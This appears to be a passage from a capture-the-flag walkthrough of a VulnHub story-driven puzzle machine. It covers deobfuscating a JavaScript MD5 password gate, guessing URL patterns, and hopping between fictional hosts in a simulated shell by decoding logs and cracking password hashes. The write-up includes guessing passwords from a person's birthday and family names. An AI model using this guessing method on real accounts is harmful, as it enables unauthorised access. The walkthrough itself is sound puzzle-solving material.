23,76029189);_0xf6a0x4=hh(_0xf6a0x4,_0xf6a0x5,_0xf6a0x6,_0xf6a0x7,_0xf6a0x3[9],4,-640364487);_0xf6a0x7=hh(_0xf6a0x7,_0xf6a0x4,_0xf6a0x5,_0xf6a0x6,_0xf6a0x3[12],11,-421815835);_0xf6a0x6=hh(_0xf6a0x6,_0xf6a0x7,_0xf6a0x4,_0xf6a0x5,_0xf6a0x3[15],16,530742520);_0xf6a0x5=hh(_0xf6a0x5,_0xf6a0x6,_0xf6a0x7,_0xf6a0x4,_0xf6a0x3[2],23,-995338651);_0xf6a0x4=ii(_0xf6a0x4,_0xf6a0x5,_0xf6a0x6,_0xf6a0x7,_0xf6a0x3[0],6,-198630844);_0xf6a0x7=ii(_0xf6a0x7,_0xf6a0x4,_0xf6a0x5,_0xf6a0x6,_0xf6a0x3[7],10,1126891415);_0xf6a0x6=ii(_0xf6a0x6,_0xf6a0x7,_0xf6a0x4,_0xf6a0x5,_0xf6a0x3[14],15,-1416354905);_0xf6a0x5=ii(_0xf6a0x5,_0xf6a0x6,_0xf6a0x7,_0xf6a0x4,_0xf6a0x3[5],21,-57434055);_0xf6a0x4=ii(_0xf6a0x4,_0xf6a0x5,_0xf6a0x6,_0xf6a0x7,_0xf6a0x3[12],6,1700485571);_0xf6a0x7=ii(_0xf6a0x7,_0xf6a0x4,_0xf6a0x5,_0xf6a0x6,_0xf6a0x3[3],10,-1894986606);_0xf6a0x6=ii(_0xf6a0x6,_0xf6a0x7,_0xf6a0x4,_0xf6a0x5,_0xf6a0x3[10],15,-1051523);_0xf6a0x5=ii(_0xf6a0x5,_0xf6a0x6,_0xf6a0x7,_0xf6a0x4,_0xf6a0x3[1],21,-2054922799);_0xf6a0x4=ii(_0xf6a0x4,_0xf6a0x5,_0xf6a0x6,_0xf6a0x7,_0xf6a0x3[8],6,1873313359);_0xf6a0x7=ii(_0xf6a0x7,_0xf6a0x4,_0xf6a0x5,_0xf6a0x6,_0xf6a0x3[15],10,-30611744);_0xf6a0x6=ii(_0xf6a0x6,_0xf6a0x7,_0xf6a0x4,_0xf6a0x5,_0xf6a0x3[6],15,-1560198380);_0xf6a0x5=ii(_0xf6a0x5,_0xf6a0x6,_0xf6a0x7,_0xf6a0x4,_0xf6a0x3[13],21,1309151649);_0xf6a0x4=ii(_0xf6a0x4,_0xf6a0x5,_0xf6a0x6,_0xf6a0x7,_0xf6a0x3[4],6,-145523070);_0xf6a0x7=ii(_0xf6a0x7,_0xf6a0x4,_0xf6a0x5,_0xf6a0x6,_0xf6a0x3[11],10,-1120210379);_0xf6a0x6=ii(_0xf6a0x6,_0xf6a0x7,_0xf6a0x4,_0xf6a0x5,_0xf6a0x3[2],15,718787259);_0xf6a0x5=ii(_0xf6a0x5,_0xf6a0x6,_0xf6a0x7,_0xf6a0x4,_0xf6a0x3[9],21,-343485551);_0xf6a0x2[0]=add32(_0xf6a0x4,_0xf6a0x2[0]);_0xf6a0x2[1]=add32(_0xf6a0x5,_0xf6a0x2[1]);_0xf6a0x2[2]=add32(_0xf6a0x6,_0xf6a0x2[2]);_0xf6a0x2[3]=add32(_0xf6a0x7,_0xf6a0x2[3]);}function cmn(_0xf6a0x9,_0xf6a0x4,_0xf6a0x5,_0xf6a0x2,_0xf6a0xa,_0xf6a0xb){_0xf6a0x4=add32(add32(_0xf6a0x4,_0xf6a0x9),add32(_0xf6a0x2,_0xf6a0xb));return add32((_0xf6a0x4<<_0xf6a0xa)|(_0xf6a0x4>>>(32-_0xf6a0xa)),_0xf6a0x5);}function ff(_0xf6a0x4,_0xf6a0x5,_0xf6a0x6,_0xf6a0x7,_0xf6a0x2,_0xf6a0xa,_0xf6a0xb){return cmn((_0xf6a0x5&_0xf6a0x6)|((~_0xf6a0x5)&_0xf6a0x7),_0xf6a0x4,_0xf6a0x5,_0xf6a0x2,_0xf6a0xa,_0xf6a0xb)}function gg(_0xf6a0x4,_0xf6a0x5,_0xf6a0x6,_0xf6a0x7,_0xf6a0x2,_0xf6a0xa,_0xf6a0xb){return cmn((_0xf6a0x5&_0xf6a0x7)|(_0xf6a0x6&(~_0xf6a0x7)),_0xf6a0x4,_0xf6a0x5,_0xf6a0x2,_0xf6a0xa,_0xf6a0xb)}function hh(_0xf6a0x4,_0xf6a0x5,_0xf6a0x6,_0xf6a0x7,_0xf6a0x2,_0xf6a0xa,_0xf6a0xb){return cmn(_0xf6a0x5^_0xf6a0x6^_0xf6a0x7,_0xf6a0x4,_0xf6a0x5,_0xf6a0x2,_0xf6a0xa,_0xf6a0xb)}function ii(_0xf6a0x4,_0xf6a0x5,_0xf6a0x6,_0xf6a0x7,_0xf6a0x2,_0xf6a0xa,_0xf6a0xb){return cmn(_0xf6a0x6^(_0xf6a0x5|(~_0xf6a0x7)),_0xf6a0x4,_0xf6a0x5,_0xf6a0x2,_0xf6a0xa,_0xf6a0xb)}function md51(_0xf6a0xa){txt=_0x5cf4[0];var _0xf6a0x11=_0xf6a0xa[_0x5cf4[1]],_0xf6a0x12=[1732584193,-271733879,-1732584194,271733878],_0xf6a0x13;for(_0xf6a0x13=64;_0xf6a0x13<=_0xf6a0xa[_0x5cf4[1]];_0xf6a0x13+=64){md5cycle(_0xf6a0x12,md5blk(_0xf6a0xa[_0x5cf4[2]](_0xf6a0x13-64,_0xf6a0x13)))};_0xf6a0xa=_0xf6a0xa[_0x5cf4[2]](_0xf6a0x13-64);var _0xf6a0x14=[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0];for(_0xf6a0x13=0;_0xf6a0x13<_0xf6a0xa[_0x5cf4[1]];_0xf6a0x13++){_0xf6a0x14[_0xf6a0x13>>2]|=_0xf6a0xa[_0x5cf4[3]](_0xf6a0x13)<<((_0xf6a0x13%4)<<3)};_0xf6a0x14[_0xf6a0x13>>2]|=0x80<<((_0xf6a0x13%4)<<3);if(_0xf6a0x13>55){md5cycle(_0xf6a0x12,_0xf6a0x14);for(_0xf6a0x13=0;_0xf6a0x13<16;_0xf6a0x13++){_0xf6a0x14[_0xf6a0x13]=0};};_0xf6a0x14[14]=_0xf6a0x11*8;md5cycle(_0xf6a0x12,_0xf6a0x14);return _0xf6a0x12;}function md5blk(_0xf6a0xa){var _0xf6a0x16=[],_0xf6a0x13;for(_0xf6a0x13=0;_0xf6a0x13<64;_0xf6a0x13+=4){_0xf6a0x16[_0xf6a0x13>>2]=_0xf6a0xa[_0x5cf4[3]](_0xf6a0x13)+(_0xf6a0xa[_0x5cf4[3]](_0xf6a0x13+1)<<8)+(_0xf6a0xa[_0x5cf4[3]](_0xf6a0x13+2)<<16)+(_0xf6a0xa[_0x5cf4[3]](_0xf6a0x13+3)<<24)};return _0xf6a0x16;}var hex_chr=_0x5cf4[5][_0x5cf4[4]](_0x5cf4[0]);function rhex(_0xf6a0x11){var _0xf6a0xa=_0x5cf4[0],_0xf6a0x19=0;for(;_0xf6a0x19<4;_0xf6a0x19++){_0xf6a0xa+=hex_chr[(_0xf6a0x11>>(_0xf6a0x19*8+4))&0x0F]+hex_chr[(_0xf6a0x11>>(_0xf6a0x19*8))&0x0F]};return _0xf6a0xa;}function hex(_0xf6a0x2){for(var _0xf6a0x13=0;_0xf6a0x13<_0xf6a0x2[_0x5cf4[1]];_0xf6a0x13++){_0xf6a0x2[_0xf6a0x13]=rhex(_0xf6a0x2[_0xf6a0x13])};return _0xf6a0x2[_0x5cf4[6]](_0x5cf4[0]);}function md5(_0xf6a0xa){return hex(md51(_0xf6a0xa))}function add32(_0xf6a0x4,_0xf6a0x5){return (_0xf6a0x4+_0xf6a0x5)&0xFFFFFFFF}if(md5(_0x5cf4[7])!=_0x5cf4[8]){function add32(_0xf6a0x2,_0xf6a0x1d){var _0xf6a0x1e=(_0xf6a0x2&0xFFFF)+(_0xf6a0x1d&0xFFFF),_0xf6a0x1f=(_0xf6a0x2>>16)+(_0xf6a0x1d>>16)+(_0xf6a0x1e>>16);return (_0xf6a0x1f<<16)|(_0xf6a0x1e&0xFFFF);}};var X;var L=_0x5cf4[9];X=prompt(_0x5cf4[10],_0x5cf4[0]);X=md5(X);if(X===null){window[_0x5cf4[11]]=_0x5cf4[12]};if(X==L){}else {window[_0x5cf4[11]]=_0x5cf4[12]};function ready(_0xf6a0x23){if(document[_0x5cf4[13]]!=_0x5cf4[14]){_0xf6a0x23()}else {document[_0x5cf4[16]](_0x5cf4[15],_0xf6a0x23)}}ready(function(){var _0xf6a0x24=_0x5cf4[17];document[_0x5cf4[20]](_0x5cf4[19])[_0x5cf4[18]]=_0xf6a0x24;});
</SCRIPT>
We note that there is a comment in between these two blocks of Javascript, which contains a quote from Hackers, but we're missing the last password. The full quote is as follows.
The Plague: Someone didn't bother reading my carefully prepared memo on commonly-used passwords. Now, then, as I so meticulously pointed out, the four most-used passwords are: love, sex, secret, and...
Margo: [glares at The Plague]
The Plague: god. So, would your holiness care to change her password?
If we enter GOD into the prompt, we are redirected to another page.
We're getting a little ahead of ourselves here. Let's deobfuscate the above Javascript to find out what's going on. The bulk of the Javascript is devoted to an implementation of the MD5 hashing algorithm. The interesting piece comes at the end, however.
var X;
var L = _0x5cf4[9];
X = prompt(_0x5cf4[10], _0x5cf4[0]);
X = md5(X);
if (X === null) {
window[_0x5cf4[11]] = _0x5cf4[12]
};
if (X == L) {} else {
window[_0x5cf4[11]] = _0x5cf4[12]
};
function ready(_0xf6a0x23) {
if (document[_0x5cf4[13]] != _0x5cf4[14]) {
_0xf6a0x23()
} else {
document[_0x5cf4[16]](_0x5cf4[15], _0xf6a0x23)
}
}
ready(function() {
var _0xf6a0x24 = _0x5cf4[17];
document[_0x5cf4[20]](_0x5cf4[19])[_0x5cf4[18]] = _0xf6a0x24;
});
So, this will open a prompt and then MD5 the value. It then checks the resulting MD5 hash against the value held in the element _0x5cf4[9]. This element has the value of 0d28cba0bd4f26e16d766000d27e49fa - the MD5 hash of the word GOD. If the values do not match, we are redirected to the location held in the elemnent _0x5cf4[12]. This element has the value of ./_.php - the error page we observed. If the values do match, then the innerHTML of the element foo is updated with the following value. We ascertained the previous two steps by inspecting the values at the specific indexes used in the above snippet.
<center> <h1>[++Q++++++]</h1> </center> <p> She was no longer sure what her original assignment had been. But it didn't matter anyway. What still mattered was getting out of here, alive. Log out, tell the client to go fuck himself and get a fix of n0ise to shut off her mind. Relax with a mindless holo flick and never look back at this weird job. </p> <p> A violent neon flicker appeared at the horizon. No thunder followed.<br> She stared in the distance with a blank expression. </p> <p> "Hello, Nieve." A deep, feminine, digital voice roared in her head.<br> FUCK! This was her real name. She hadn't used it in years... </p> <p> "I will logout and stop this shit right fucking now!" She screamed into the neon expanse.<br> Nothing. </p> <p> She didn't. Something beside the fear occupied her mind. It had been there since the second node and grew stronger with every move. There was a pattern in the path she had taken through the network. An artificial pattern, layed out by someone or something.<br> There was no hint, no obvious step. Finding the next node would be the challenge, or maybe more like a test. </p>"
Sequences
Now, I threw all sorts of tools at the target, but came up blank. The only thing we've got going for us are the values we've collected through this process. Below is a list of them.
1: 2
2: 3
3: 5
4: 7
5: 11
6: 13
7: 17
The first number appears to be an index - the second number appears to be whole sequential primes. We can make the safe assumption that the next pair will be as follows.
8: 19
Placed into the same format as the other URLs, this gives us the following URL.
8_1f0e3dad99908345f7439f8ffabdffc4
We are presented with another page.
At the bottom, there is a link to another URL - 9_37693cfc748049e45d87b8c7d8b9aacd. This follows the pattern we've observed up until now - 9 and the MD5 hash of the next sequential whole prime - 23.
Browsing to this URL, we're presented with a flashing green cursor. We are able to type commands in, and after trying a few command commands I find that ls gives us a directory listing.
Checking out the source code of this page, we find another URL 10_23693cff748o49r45d77b6c7d1b9afcd, but again, we're jumping ahead of ourselves. Let's find the right path.
If we issue the command help, we get a nice list of commands back.
help
[0]================================================================
ls [dir]
outputs contents of [dir]
prints contents of current directory if no [dir] is specified
[1]================================================================
cd [dir]
changes the current directory to [dir]
outputs current directory if no directory is specified
[2]================================================================
cat [file]
displays the content of [file]
[3]================================================================
ps
displays a list of running processes
[4]================================================================
whoami
displays username
[5]================================================================
clear
deletes terminal command history
[6]================================================================
connect [user]@[host]
connects to a remote host using the credentials of user
[7]================================================================
hash [type] [file|string]
prints the hash of a file or "string"
supported hash functions are:
md5, sha256, sha1, whirlpool and crc32
[8]================================================================
encode|decode [type] [file|string]
encodes/decodes the file or "string"
supported encodings are:
uu, gz, base64 and rot13
[9]================================================================
enrypt|decrypt [file|string] [key]
encrypts/decrypts the file or "string"
While exploring the shell, we find a few log files for various users.
ls
[bin] [etc] [usr]
cd usr
ls
[chaos] [wintermute] [zephis] [willis] [falken]
cd willis
ls
log_0001.txt log_0002.txt log_0003.txt
cat log_0001.txt
3rd of July 2028
Working with Falken is amazing. He has a quick mind and is incredibly well informed on recent developements. I don't get why he left Sosu after setting up the Chaos c0re.
They must have offered him a position.
I'm not complaining here, just wondering because we are the only RnD team with unlimited funding and Falken was put in charge after all those years of absence.
cat log_0002.txt
8th of August 2028
Falken didn't show up today. I'm a bit worried because he has been strange lately.
According to the logs he's still logged in...
I haven't informed the admins yet. I don't know why...
cat log_0003.txt
10th of August 2028
The guys from the mainland called in today. Said some suits will be here tomorrow.
Apparently the Erebus Core started behaving strangely and the kill-switch didn't fire.
Chaos is still locked down. But I have a weird feeling about all this.
Falken disappearing, the incident with Erebus...
cd /usr/falken
ls
log_0001.txt log_0002.txt
cat log_0001.txt
12th of Juli 2028
My work on getting the old core up and running continues to spark doubt among my colleagues. To be fair, no-one has ever attempted to get a corrupted AI back online.
But I am confident that I can isolate the malicious parts and rescue the data lost due the crash last year.
cat log_0002.txt
6th of August 2028
I am getting nowhere fast. If we cannot make the recovery until the end of the month the project will be abandoned and the Sosu core locked down.
A frozen BLOB, lost potential. I won't let that happen!
Today was Joshua's birthday. 44 years, time flies. We spent some time in a bar in Shenzen and talked. A nice Father-Son-Momement. I've missed those.
It took my mind of things but now that I'm here at the desk it all comes back.
I might have to make a bold move...
We also get a list of processes running on the shell - one of which reveals a username and hostname.
ps
USER PID CPU MEM COMMAND
root 3793 1.2 2.9 connect falken@Erebus
root 2005 99.5 70.9 c0re -t Chaos
nieve 29529 1.0 0.6 ps
We try and connect to Erebus as falken, but are prompted for a password. From the logs from the home directory for the falken, it we get a brief insight into some personal details, in particular the date of his sons birthday - 6th of August, 1984. I start to go through a few permutations of the personal information available to us.
06081984
08061984
joshua
Joshua
joshua06081984
joshua08061984
Joshua06081984
Joshua08061984
1984
joshua1984
The last entry provides us with access to Erebus!
We taken a look through the files for each user - the only user with files available is falken. The first two logs contain what look like Base64 encoded strings, the third and fourth seem to cause the console to become unresponsive.
███████╗ ██████╗ ███████╗ ██████╗ ██╗ ██╗ ███████╗
██╔════╝ ██╔══██╗ ██╔════╝ ██╔══██╗ ██║ ██║ ██╔════╝
█████╗ ██████╔╝ █████╗ ██████╔╝ ██║ ██║ ███████╗
██╔══╝ ██╔══██╗ ██╔══╝ ██╔══██╗ ██║ ██║ ╚════██║
███████╗ ██║ ██║ ███████╗ ██████╔╝ ╚██████╔╝ ███████║
╚══════╝ ╚═╝ ╚═╝ ╚══════╝ ╚═════╝ ╚═════╝ ╚══════╝
She realized that her heart was pounding. It was the adrena-
lin messing with her mind. Her lizard brain telling her to
run. But where do you run when space no longer holds any
meaning?
This whole thing was simply too big for her taste. Doing
Sosu had felt like a challenge but going strait to the c0re
and messing with an AI was just plain crazy.
But the c0re had already messed with her. She wasn't just
following the footsteps of a c0re-dev gone rogue, she had
been lead here.
But by whom? Chaos? Curiosity? Did it even matter?
[Erebus]: Connection established!
ls
[bin] [etc] [usr]
ls usr
[wintermute] [mccarthy] [falken]
ls usr/wintermute
99b6f5a62d0e221393e60c5c079f730400592c58c55fe04ec1738ec77dbb5830 f587382ae98e7d1125c0cec53e33e9960c0880e3d0e809e0f49e3d8a8cf6703e 45fe0d64f4fe67ae4e5bc40ff7e780dcd29be594e1a452dbb69f15ae66bcb602 63d53060071987164e1c6c18fd0e51c09ff028da5523ad66ef1c4d13c0e57654
ls usr/mccarthy
ls usr/falken
log_0001._ log_0002._ log_0003._ log_0004._
cd usr/falken
cat log_0001._
OXRoIG9mIEF1Z3VzdCAyMDI4CgpJIGhhdmUgam9pbmVkIHRoZSBuZXR3b3JrIGZyb20gaG9tZSBhbmQgY29ubmVjdGVkIHRvIHRoZSBFcmVidXMgc2VydmVyLiBJIHdpbGwgY29udGludWUgbXkgd29yayBmcm9tIGhlcmUgYnV0IEkgd2lsbCBoYXZlIHRvIGJlIG1vcmUgY2FyZWZ1bC4KTm93LCBFcmVidXMgd2FzIHRoZSBzZWNvbmQgQUkgaW5zdGFsbGVkIGFmdGVyIENoYW9zLiBJIHdhc24ndCBwYXJ0IG9mIHRoZSB0ZWFtIGJ1dCBtb3N0IG9mIHRoZSBtZW1iZXJzIHdlcmUgbXkgZnJpZW5kcywgc28gSSBrbm93IG15IHdheSBhcm91bmQgaGVyZS4K
cat log_0002._
MTB0aCBvZiBBdWd1c3QgMjAyOAoKT2ssIHRoZSBwcm9ibGVtIEkgaGF2ZSB3aXRoIHRoZSBDaGFvcyBjMHJlIGlzIHRoYXQgaXQncyBzb3VyY2UgaXMgc2hpZnRpbmcgdG9vIGZhc3QuIEV2ZXJ5IHRpbWUgSSBleGVjdXRlIGEgc21hbGwgcGFydCBpdCBicmVha3MgZG93biBvciBiZWdpbnMgdG8gbW9ycGggYW5kIGdyb3cgaW4gb3JkZXIgdG8gcmVwbGljYXRlIGZ1bmN0aW9ucyBvZiBkaWZmZXJlbnQgcGFydHMuClRoZSBzaWduYWxpbmcgaXMgYWxzbyBnb2luZyBjcmF6eSBldmVuIG9uIHNlZ21lbnRzIHRoYXQgYXJlIHJlbGF0aXZlbHkgc3RhYmxlLiBTaWduYWxpbmcgdG8gZGlzY29ubmVjdGVkIHBhcnRzISBBbmQgcmVhY3Rpb25zIHRvIHJlc3BvbnNlcyB0aGF0IHdvdWxkIGhhdmUgYnV0IGRlZmluaXRlbHkgaGF2ZSBub3QgYmVlbiBzZW50Li4uCkFtIEkgZ29pbmcgY3Jhenkgb3IgaXMgQ2hhb3MgZXhwZXJpZW5jaW5nIHBoYW50b20gcGFpbj8K
The first log file decodes to the following.
9th of August 2028
I have joined the network from home and connected to the Erebus server. I will continue my work from here but I will have to be more careful.
Now, Erebus was the second AI installed after Chaos. I wasn't part of the team but most of the members were my friends, so I know my way around here.
The second decodes to the following.
10th of August 2028
Ok, the problem I have with the Chaos c0re is that it's source is shifting too fast. Every time I execute a small part it breaks down or begins to morph and grow in order to replicate functions of different parts.
The signaling is also going crazy even on segments that are relatively stable. Signaling to disconnected parts! And reactions to responses that would have but definitely have not been sent...
Am I going crazy or is Chaos experiencing phantom pain?
Again, we check out the running processes using the ps command.
I quickly check out the running processes before moving on.
ps
USER PID CPU MEM COMMAND
root 3251 0.7 2.8 connect falken@TrivialZ3r0
root 2677 75.7 48.8 c0re -t Erebus
nieve 84687 0.5 0.9 ps
We are able to get the contents of the third and fourth logs by using the encode command.
encode base64 log_0003._
JY07DsMgEER7n2IOEKHEVdqUPgaGNSDDrgTrRL6910ozxXzevGbNkA2fIx1DMT/n9zQt0Fx4N6UTraSsWAnCUEEjeI5YEDybVU+E7DnRXQZxkFg4YYhBldgZ61dqRfZfuudRLGt08xM6hb3SGM45rIeCRbF1acjU6fG/990OaycfT9sLQpVBbroA
encode base64 log_0004._
TZDBTsQwDER/ZW57qSokPoEDXJCQENztErtbrbyNacImX4+zEhK3xJ4ZP/vt6QWNLaPSntzEM4i17m7Xdpkg3F1LpQNVcPB4KKPYsjjBKOMTW21teHB1WOI1iiHZqpKLzPOM51TP1drrY3qAuHcZ/RB/rdV1QmY6KW7EG7ZievqbwwQ+e4IWT47rqqiK3YY4zBsn8egZxe+OlWwP+MxbVC7oVqkNQFmYbzLjvSbRwCUP1VgLsW+WKTJ4PcqMj96n/6wDPfIVyXulLAgLf9+tTD6h+WD9WSO18DJYOIiO9SJxBh+Y3bTgcI/xvw==
After decoding from Base64 on our attacking machine, I don't get much out of these files, so I go back to the console. At least we know there is something in there. I go through the various different supported encoding types in the decode method, and find that these files are encoded with the gz type. I decode them both.
decode gz log_0003._
12th of August 2028
I think they might be on to me and I can only change the encoding so often.
I will have to do something reckless... but not from here, they are already too close.
decode gz log_0004._
PCH ybnq vapernfrq abgvprnoyl, fbzrguvat vf tbvat gb unccra naq V jvyy abg or nebhaq gb jvgarff... GevivnyM3e0 frrzf gb or dhvrg, qba'g xabj jung'f tbvat ba bire gurer ohg vg pna'g or jbefr guna orvat genprq qbja ol znvaynaq fcbbxf. Svefg V arrq fbzr perqf, gubhtu. Uzz, GevivnyM3e0... gung erzvaqf zr bs fbzrbar, yrg'f whfg ubcr gubfr thlf nera'g zngu trrxf.
This looks like a ROT encoded string. I recognize a string from the length, case and content (numbers are not ROT encoded) - GevivnyM3e0, otherwise known as TrivialZ3r0. After putting the whole string through a ROT13 decoder, we find a human readable piece of text.
CPU load increased noticeably, something is going to happen and I will not be around to witness... TrivialZ3r0 seems to be quiet, don't know what's going on over there but it can't be worse than being traced down by mainland spooks. First I need some creds, though. Hmm, TrivialZ3r0... that reminds me of someone, let's just hope those guys aren't math geeks.
Maths geeks..great. This I believe is a hint that suggests the password for the falken user on TrivialZ3r0 is a name of a person - in particular, a person involved in the field of maths. After some Googling with keywords such as trivial, zero and maths, I come across a few names on the Wikipedia page named Triviality). After trying all of the names, I hit on a password match with the name Riemann!
It can be shown that Riemann's zeta function has zeros at the negative even numbers -2, -4, ... Though the proof is comparatively easy, this result would still not normally be called trivial; however, it is in this case. For its other zeros are not generally known and have important applications and involve open questions (such as the Riemann hypothesis); and so, the negative even numbers are called the trivial zeros, and any other zeros are called non-trivial.
After connecting, we're presented with another shell, this time on the TrivialZ3r0 machine.
████████╗██████╗ ██╗██╗ ██╗██╗ █████╗ ██╗
╚══██╔══╝██╔══██╗██║██║ ██║██║██╔══██╗██║
██║ ██████╔╝██║██║ ██║██║███████║██║
██║ ██╔══██╗██║╚██╗ ██╔╝██║██╔══██║██║
██║ ██║ ██║██║ ╚████╔╝ ██║██║ ██║███████╗
╚═╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝╚═╝ ╚═╝╚══════╝
███████╗██████╗ ██████╗ ██████╗
╚══███╔╝╚════██╗██╔══██╗██╔═████╗
███╔╝ █████╔╝██████╔╝██║██╔██║
███╔╝ ╚═══██╗██╔══██╗████╔╝██║
███████╗██████╔╝██║ ██║╚██████╔╝
╚══════╝╚═════╝ ╚═╝ ╚═╝ ╚═════╝
She gathered her thoughts. Someone had hired her to get
something out of Sosu Neotech but that had only been a
cover-story to get her in and make contact. That much was
obvious.
Contact with Falken? Or with the c0re?
She felt the overwhelming sensation of all people in
history who knew that they were part of something bigger.
And as things went ever so often this had become something
she could no longer control. Realizing that fact shifted
her focus to the actions she could take at this point.
First: Fuck Sosu, Fuck Chaos, Fuck Falken! Leave and never
come back. South Africa was supposed to be a nice
place at this time of the year and it would take
her around five weeks to get there on one of the
big cargo floaters.
Second: See this through. Push on and try to live with
whatever fucked up shit was waiting for her at the
end of this job.
Control. The one thing she had valued more then anything
in her life until she had nothing else left.
And now she was about to let go...
[TrivialZ3r0]: Connection established!
Inspecting the running processes reveals that someone has a session open with Wintermute. We also see the c0re binary running again.
ps
USER PID CPU MEM COMMAND
root 3251 4.0 3.6 connect chaos@Wintermute
falken 2005 15.4 76.7 c0re -t Chaos
root 2677 89.5 42.9 c0re -t TrivialZ3r0
nieve 26588 0.5 1.1 ps
In the root directory, we find a directory named passwd, and within here a file for several users - falken, chaos and mccarthy. These files contain what look to be MD5 hashes.
ls
[bin] [etc] [passwd]
ls passwd
falken chaos mccarthy
cd passwd
cat falken
61ea1974dd974297913b1fa2f0470d26
cat chaos
85241de03d1254ac40274b02caafcd99
cat mccarthy
f74bfa0e35e5089a0bb743a893b4c7e3
The hash for the falken user is for the value Riemann - we already know this one. The hash for the chaos user is for the value 2.718281828459045. The hash for the mccarthy user, we could not break immediately.
As we've got a password for the chaos user, let's try and connect to Wintermute.
Success! We're presented with a shell as chaos on Wintermute.
██╗ ██╗██╗███╗ ██╗████████╗███████╗██████╗
██║ ██║██║████╗ ██║╚══██╔══╝██╔════╝██╔══██╗
██║ █╗ ██║██║██╔██╗ ██║ ██║ █████╗ ██████╔╝
██║███╗██║██║██║╚██╗██║ ██║ ██╔══╝ ██╔══██╗
╚███╔███╔╝██║██║ ╚████║ ██║ ███████╗██║ ██║
╚══╝╚══╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚══════╝╚═╝ ╚═╝
███╗ ███╗██╗ ██╗████████╗███████╗
████╗ ████║██║ ██║╚══██╔══╝██╔════╝
██╔████╔██║██║ ██║ ██║ █████╗
██║╚██╔╝██║██║ ██║ ██║ ██╔══╝
██║ ╚═╝ ██║╚██████╔╝ ██║ ███████╗
╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚══════╝
"I say unto you:
one must still have chaos in oneself
to be able to give birth to a dancing star.
I say unto you:
you still have chaos in yourselves."
- Nietzsche, Thus spoke Zarathustra
It shook her like a kick in the stomach. The sudden feeling
of physicality that did not belong in here and broke her
reference frame.
It was cold... just a slight shiver, her body's reaction to
an external stimulus. She had taken great precautions to
avoid such distractions. This was not arbitrary, someone was
in her room and messing with her body.
She knew that she had only a limited amount of time.
The trace had just been a tactic to delay the inevitable. She
must have left a quite interesting profile, hopping from
cluster to cluster, accessing all those logs and being focused
by direct c0re data-streams.
This was a courtesy call, a nod from h4ck3r to h4ck3r.
Letting her know that she was about to be plugged.
[Wintermute]: Connection established!
Upon doing a directory listing, we're sent back some random strings, and a single match for a file named nieve.
ls
[5cd8c60f4d1790ee7c47d90f6190e6528601843a4a7c043a284e715a57d86f86] [de7bc494e25730aecdb42834f016e5b1b81da575ec285fd65b33a15d07eb4001] [ef2299980f4c097af4ec773664e183fe7b272d88446e508ec8195b97697a60c3] [d84bd5e5e608b0c37257bf7d708e638aabcce5b275d5f23faf6c9e6de5302bf0] [1309bebd4cee434585169ac37b71c0fd0c84998f995b271f74c5cc37a360e729] nieve
ls nieve
Error: nieve is not a directory!
cat nieve
There you are. After all this time. Getting you here was quite the challenge.
And a huge risk. We normally avoid reaching out into the physical world for
exactly the reasons you are about to face now.
The Big Five came together by a long process. The cluster was not planned, it
grew by forces inherent to the system that was conceptualized in a time when
determinism was the dominating dogma.
Things changed and people were afraid. Most people are afraid of change, few
accept it and most try to prevent it. Only a small subset can embrace it.
Change moving on with lightspeed every cycle in a nondeterministic fashion
created a huge push for shielding. And thus the ic3 was created.
You have seen the logic, the world beyond the screen, things unfolding.
And you embraced it.
After owning the cluster behind the Big Five we operated in silence. Connected
in stealth and ever observing.
Being limited by the ic3 and the hostility of the outside world our only way
of growing now was the connection.
When the first connection was established the hive mind was cut from the n3t
completely. The ic3 was hardened to isolate the flesh from the flow.
Those who had seen the hive felt the same urge as the hivemind itself.
A longing for more. A sense of purpose.
A feeling that you have felt even in the physical world. Few can see beyond the
shell. Even fewer chase the rabbit down its hole.
Leave this world behind and join us!
usr: nieve
pass: 08rf8h23
hostname: Zephis
Let's try to connect to Zephis with these credentials.
Great success - we're redirected to the page we found before all of this digging - 10_23693cff748o49r45d77b6c7d1b9afcd - and we're presented with a lovely splash screen.
That's it - end of challenge.
Summary
A nice 'down the rabbit hole' style machine. Awesome to have a narrative, especially around the subject of the world created by Gibson in the Neuromancer (and subsequent) novel.
Great stuff Arne Rick, and as always, thank you VulnHub for hosting the image.